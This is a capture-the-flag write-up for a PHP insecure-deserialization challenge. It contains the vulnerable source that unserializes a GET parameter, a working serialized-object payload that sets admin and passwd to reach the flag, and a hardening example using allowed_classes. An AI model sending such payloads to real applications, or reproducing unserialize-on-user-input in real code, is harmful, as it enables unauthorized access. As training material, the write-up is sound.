SWPUCTF 2021 Freshman Competition: ez_unserialize


(1) The challenge

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

    public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?> 

Background on PHP classes:

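(2) The core of this challenge is to change passwd (and admin) through the value passed in p. The value has to be supplied in serialized form, because the script hands p straight to unserialize() and __destruct() then runs on the resulting object.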

 <?php
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="admin";
        $this->passwd = "ctf";
    }

}
$p= new wllm();
echo serialize($p);

?>  
// Output: O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

Construct the payload: ?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

(3) The flag is revealed.
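
Added example (not part of the original post or the challenge source): the serialized string from step (2) passed to unserialize() with default options and then with allowed_classes set to false, which stops PHP from instantiating wllm so its __destruct() never sees the supplied properties. The static counter $privileged is an assumption that stands in for the flag.php include.

```php
<?php
// Stand-in for the challenge class. The flag include is replaced by a
// counter (assumption for this example) so the script is self-contained.
class wllm {
    public $admin = "user";
    public $passwd = "123456";
    public static $privileged = 0; // how often the privileged branch ran

    public function __destruct() {
        if ($this->admin === "admin" && $this->passwd === "ctf") {
            self::$privileged++;
        }
    }
}

// Serialized string from step (2) of the write-up.
$p = 'O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}';

// 1) As in the challenge: any class named in the input is instantiated,
//    so the caller-chosen property values reach __destruct().
$obj = unserialize($p);
unset($obj); // the destructor runs here
echo "default options:       privileged branch ran ",
     wllm::$privileged, " time(s)\n";

// 2) Hardened: do not instantiate classes from untrusted input.
//    The result is a __PHP_Incomplete_Class, which has no wllm destructor.
wllm::$privileged = 0;
$obj = unserialize($p, ['allowed_classes' => false]);
echo "resulting class:       ", get_class($obj), "\n";
unset($obj);
echo "allowed_classes=false: privileged branch ran ",
     wllm::$privileged, " time(s)\n";
```

The allowed_classes option exists since PHP 7.0; where only plain data is needed from the client, json_decode() avoids object instantiation altogether.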

  • Copyrights © 2021-2023 00hello00